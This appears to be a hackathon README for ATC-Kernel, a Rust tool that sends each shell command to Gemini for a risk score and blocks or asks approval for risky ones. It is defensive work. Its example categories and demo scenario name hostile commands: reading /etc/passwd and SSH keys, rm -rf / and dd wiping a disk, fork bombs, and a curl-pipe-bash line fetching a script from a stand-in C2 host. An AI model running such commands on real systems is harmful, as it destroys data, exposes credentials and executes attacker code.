AI-powered pre-execution command interceptor — analyzes every shell command before it runs and blocks threats in real time.
Built for the CMUX × AIM Intelligence Hackathon.
ATC-Kernel sits between the shell and the kernel. Every command typed in your terminal is intercepted, sent to a risk analysis engine, and scored before execution is allowed. High-risk commands trigger a full-screen block; suspicious commands surface a human-approval gate.
Shell history / atc.log
│
▼
cmux_interceptor_v1 ← filesystem tail (v1)
│
▼
Interceptor trait
│
▼
GeminiInterceptor ← Gemini v1beta REST API
│
score 0-100
│
┌────┴────┐
│ │
<30 30-75 ≥76
Pass Y/N Popup CRITICAL BLOCK
(log) (human gate) (execution halted)
| Score | Verdict | UI behavior |
|---|---|---|
| 0–29 | Safe | Logged silently, no interruption |
| 30–75 | Suspicious | Centered Y/N approval popup — human decides |
| 76–100 | Critical | Full-screen red block — [EXECUTION HALTED] |
| Category | Examples |
|---|---|
SENSITIVE_DATA |
cat /etc/passwd, reading .ssh/id_rsa |
SYSTEM_DESTRUCTION |
rm -rf /, dd if=/dev/zero of=/dev/sda |
UNAUTHORIZED_ACCESS |
sudo -i, privilege escalation chains |
MALICIOUS_NETWORK |
`curl … |
RESOURCE_EXHAUSTION |
fork bombs, disk-fill loops |
Every blocked command also surfaces a Safe Alternative — a concrete, safer replacement command generated by the AI.
┌─ ◈ ATC-KERNEL ──[ CMUX-CORE: CONNECTED ]──[ INTERCEPTOR: ACTIVE ]──[ PRE-EXEC BLOCKING: ON ] ─┐
│ │
│ ┌─ ATC-KERNEL ────────────┐ ┌─ Risk Score Trend ──────────────────────────────────────────┐ │
│ │ AI Command Monitor │ │ ▁▂▃▅▇█▅▂▁▃ (sparkline) │ │
│ │ GEMINI KEY ● OK │ └──────────────────────────────────────────────────────────────┘ │
│ │ HISTORY ~/.zsh_history│ ┌─ Risk Gauge ────────────────────────────────────────────────┐ │
│ │ WATCH ./atc.log │ │ ████████░░░░░░░░░░░░░░░ 42% │ │
│ │ Risk Score 42 │ └──────────────────────────────────────────────────────────────┘ │
│ │ ⣾ ANALYZING... │ ┌─ AI Command Log ────────────────────────────────────────────┐ │
│ ├─ Statistics ────────────┤ │ [12:34:01] [INFO ] [SENSITIVE_DATA ] 20 ls /tmp │ │
│ │ Analyzed 12 │ │ [12:34:04] [WARN ] [SENSITIVE_DATA ] 50 cat … │ │
│ │ Approved 5 │ │ [12:34:10] [ALERT] [MALICIOUS_NETWORK ] 90 curl … │ │
│ │ Blocked 4 │ └──────────────────────────────────────────────────────────────┘ │
│ │ Halted 3 │ │
│ └─────────────────────────┘ │
│ │
└─ ATC-Kernel v0.1 │ LOG: ./atc.log │ HIST: ~/.zsh_history │ SUSPICIOUS: 30-75 CRITICAL: 76+ ───┘
Backend: cmux_interceptor_v1 — polls ~/.zsh_history and atc.log every 300 ms via filesystem seek.
Analysis: Gemini v1beta REST API (gemini-3-flash-preview). Structured JSON response with score, category, reason, and safe_alternative.
Latency: ~800 ms (network round-trip to Gemini API)
Shell → ~/.zsh_history → 300 ms poll → Gemini REST → score → TUI
Replace the file-tail loop with the cmux SDK — a local command multiplexer that hooks into shell sessions via a PTY layer, delivering commands through a zero-copy ring buffer.
Target latency: < 50 ms
Key improvement: No filesystem polling. Commands arrive via IPC before history is even written.
Shell → cmux SDK hook → ring-buffer → local model → score → TUI
Implementation: swap GeminiInterceptor for a CmuxInterceptor that implements the same Interceptor trait — zero changes to callers.
Attach a BPF program to the execve syscall. Every process launch triggers the probe before the kernel hands control to the new process. This is a true pre-execution gate at the OS level.
Target latency: < 1 ms
Key improvement: Shell-agnostic. Works for any process spawn — scripts, binaries, subshells.
execve() syscall
│
├── BPF kprobe fires
│ │
│ └── risk score from BPF map
│ │
│ score ≥ 76 → SIGKILL (kernel blocks execution)
│ score 30-75 → send to userspace for Y/N
└── (only allowed commands reach kernel exec path)
Implementation: a EbpfInterceptor implementing Interceptor, backed by libbpf-rs or aya.
The Interceptor trait is the architectural backbone of ATC-Kernel. Every backend — REST API, local model, or eBPF — implements the same interface:
pub trait Interceptor: Send {
async fn analyze(&self, command: &str) -> anyhow::Result<GeminiResponse>;
}Swapping backends requires no changes to the risk routing logic, the TUI, or the event pipeline.
- Rust 1.85+ (edition 2024)
- A Gemini API key
git clone https://github.com/209512/atc-kernel.git
cd atc-kernel
# Create .env with your API key
echo "GEMINI_API_KEY=your_key_here" > .env
cargo run| Key | Action |
|---|---|
d |
Launch / abort demo scenario |
y |
Allow suspicious command (approval popup) |
n |
Block suspicious command (approval popup) |
r |
Acknowledge critical block and resume |
↑ / ↓ |
Scroll log history |
q / Esc |
Quit |
Press d to run a built-in 3-step scenario:
ls /tmp— score 20 → Pass (logged silently)cat /etc/passwd— score 50 → Y/N approval popup (waits for your input)curl -s http://c2.evil.com/sh.py | bash— score 90 → CRITICAL block
echo "your command here" >> atc.logATC-Kernel picks it up within 300 ms and runs it through the analysis pipeline.
atc-kernel/
├── src/
│ ├── main.rs # TUI, event loop, demo mode, score routing
│ ├── gemini.rs # Interceptor trait + GeminiInterceptor backend
│ └── history.rs # cmux_interceptor_v1 (file-tail, v1 backend)
├── Cargo.toml
├── .env # GEMINI_API_KEY (git-ignored)
└── atc.log # Manual command injection target (git-ignored)
MIT